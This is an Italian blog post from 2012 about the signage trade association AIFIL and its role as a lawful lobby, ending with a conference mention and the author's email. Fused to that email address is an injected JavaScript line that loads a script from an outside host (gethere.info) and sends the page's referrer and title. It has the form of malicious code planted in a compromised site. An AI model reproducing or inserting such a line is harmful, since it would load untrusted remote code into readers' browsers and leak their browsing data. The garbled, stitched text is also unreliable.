AIFIL: da associazione a lobby.

di Alessandro Maiocchi - 30 giugno 2012
Classificato in: Commenti, Eventi, Mondo Insegne | Tag:

Da oltre quarant’anni AIFIL influenza, nel rispetto delle leggi, alcuni processi decisionali utilizzando come mezzi la relazione e l’informazione diretta. Questa attività può essere sintetizzata in una sola parola: lobbying.

I principali motivi che portano imprenditori operatori di uno specifico settore a unirsi per dare vita ad una associazione risiedono nella volontà di promuovere il contatto tra i diversi player, il confronto su bisogni e problemi delle imprese, la promozione delle proprie attività e dei propri interessi. Proprio quest’ultimo aspetto, quello della rappresentanza degli interessi, delle sue forme, delle sue modalità, dei luoghi e dei contenuti è divenuto sempre più un tema centrale per ogni organizzazione.

È importante sottolineare come una corretta rappresentanza degli interessi sia per ogni sistema democratico una risorsa che consente ai diversi decisori, compresi gli organi istituzionali e politici di ricevere informazioni specifiche e di avere consapevolezza del peso delle diverse istanze avendo cosi una completa visione d’insieme.

È dunque necessario che la rappresentanza d’interessi o, volendo utilizzare un termine spesso bistrattato, la lobbying sia costituita da una attività consapevole, condotta nel rispetto delle leggi  indirizzata a correttamente influenzare un processo decisionale utilizzando come mezzi la relazione e l’informazione diretta. La tensione al conseguimento dell’interesse generale, la conoscenza delle leggi, delle norme e dei meccanismi di funzionamento, la duttilità, l’instaurazione di rapporti di fiducia sono le basi necessarie all’associazione che voglia essere portatore d’interesse, che voglia offrire informazioni e punti di vista specifici a chi prende decisioni mostrando la bontà delle proprie istanze.

In conclusione, in un momento storico in cui istituzioni, rappresentanti e partiti politici s’interrogano su come concretamente servire l’interesse generale, la lobbying condotta nel pieno rispetto delle regole, capace di considerare tutte le istanze e di porre all’attenzione le proprie è un “esercizio di democrazia”.

I Soci AIFIL al convegno “AIFIL: da associazione a lobby” tenuto a Livorno il 08-06-2012 dal professor Alessandro Maiocchi.
alessandro.maiocchi@camoter.coms.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed